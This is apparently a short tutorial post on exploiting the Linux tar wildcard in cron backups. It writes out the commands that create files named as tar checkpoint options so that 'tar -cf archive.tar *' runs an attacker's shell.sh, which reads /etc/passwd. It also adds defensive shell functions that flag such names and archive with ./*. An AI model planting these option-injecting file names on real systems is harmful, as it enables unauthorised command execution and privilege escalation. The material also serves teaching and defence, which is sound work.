What is the ‘tar’ command in Linux?
The tar (tape archive) command is a frequently used Linux command that stores files in an archive. It is available by default on most Linux systems, so you do not need to install it separately.
Backup files with ‘tar’:
On many systems, a cron job runs the command below to back up all the files in a directory:
tar -cf archive.tar *
The above command creates an archive named “archive.tar” which stores all the files in the current location from where the command is executed.
The screenshot below shows the test1 and test2 files being archived when the above command is executed:
The ‘tar’ command has two options that can be exploited:
--checkpoint=<NUMBER>: displays progress after every <NUMBER> record.
--checkpoint-action=ACTION: executes ACTION on each checkpoint.
Exploiting the ‘tar’ wildcard command:
We will create two blank files (using the ‘touch’ command) whose names are tar options:
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh shell.sh"
shell.sh is a simple file with a .sh extension.
Below contents are present in the shell.sh file:
cat /etc/passwd (this can be changed to any other command depending on requirement)
We have completed all the steps for running the exploit. It’s time to execute the exploit:
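Run the below command again:
tar -cf archive.tar *
Voila!!! Our own command got executed. The shell expands * into the file names in the directory before tar starts, so tar receives the two specially named files as command-line options and runs shell.sh at the first checkpoint.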
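The defensive counterpart of the steps above, as an added example that is not part of the original post: one function lists the file names in a directory that tar would parse as options, and the other builds the archive with ./* so that no name can start with a dash. The function names and the requirement that the archive path be absolute are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the original post. Function names are hypothetical.

# List entries of directory $1 whose names start with "-". These are the
# names that an unquoted "*" hands to tar as options instead of as files.
list_option_like_names() {
    (
        cd -- "$1" || exit 2
        for name in -*; do
            # An unmatched glob stays literal; skip it unless it really exists.
            [ -e "./$name" ] || [ -L "./$name" ] || continue
            printf '%s\n' "$name"
        done
    )
}

# Archive the contents of directory $1 into $2 (assumption: $2 is an absolute
# path outside $1). Option-like names are reported on stderr, then archived
# as ordinary files: "./*" makes every operand start with "./", so tar
# cannot parse any of them as an option.
safe_backup() {
    src=$1
    out=$2
    suspicious=$(list_option_like_names "$src") || return 2
    if [ -n "$suspicious" ]; then
        printf 'warning: option-like names in %s:\n%s\n' \
            "$src" "$suspicious" >&2
    fi
    ( cd -- "$src" && tar -cf "$out" ./* )
}
```

In a cron job, replacing `tar -cf archive.tar *` with a call such as `safe_backup /path/to/dir /path/to/archive.tar` keeps the backup working while the warning on stderr surfaces the planted file names for review.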